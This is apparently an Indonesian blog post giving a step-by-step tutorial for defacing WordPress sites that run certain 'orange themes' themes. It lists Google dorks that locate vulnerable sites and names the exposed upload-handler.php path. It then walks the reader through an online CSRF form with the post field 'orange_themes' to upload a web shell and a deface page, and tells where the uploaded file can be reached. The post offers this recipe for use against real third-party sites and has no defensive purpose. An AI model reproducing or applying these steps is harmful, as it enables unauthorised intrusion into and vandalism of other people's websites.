Guys follow ig mimin Follow Instagram
Beranda
deface

DEFACE POC WP ORANGE WITH CRSF





Assalamualaikum warahmatullahi wabatokatuh.

Kali ini admin akan berbagi tutorial deface poc wp-orange with csrf-online.

Okey langsung aja yah gaes...

Bahan:
1.Dork
2.Crsf online
3.Sc deface
4.Exploit
5.Kopi+baygon+fanta

Okey langsung ke tutornya...
Simak yah gaes

Tutorial:

Okey langsung aja ke kita ngedork yah gaes...
Dork:

- inurl:/wp-content/themes/rockstar-theme
- inurl:/wp-content/themes/kernel-theme
- inurl:/wp-content/themes/bordeaux-theme
- inurl:/wp-content/themes/bulteno-theme
- inurl:/wp-content/themes/rayoflight-theme

*kembangin lagi biar dapat yang vuln

Nah...jika sudah dapat target...kita klik&langsung masukkan exploitnya 

Exploit:
/wp-content/themes/sesuaikan dork/functions/upload-handler.php

*sesuaikan dork maksudnya jika kita pilih dork yang berakhiran rockstar-theme maka dorknya
wp-content/themes/rockstar-theme/functions/upload-handler.php

Okey..lanjut.

Jika setelah anda masukkan exploit,yang keluar tulisan eror,berarti webnya vuln yah gaes.


Nah...vuln.

Langsung aja klik salin link...kita pastekan di crsf onlinenya yah.

Langsung klik 'lock target'
Post file diisi orange_themes

Trus upload shell

Nah...nanti akan keluar tulisan...kita copy dan simpan yah gaes...

Done.
Tinggal panggil scriptnya...caranya:
/wp-content/uploads/tahun/bulan/SC deface kalian

Dan...done...
Sekian terimagaji 
Moga bermanfaat
Papay...

About the Author

Halo, Selamat datang, Selamat berbelanja...
#deface

Posting Komentar

Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.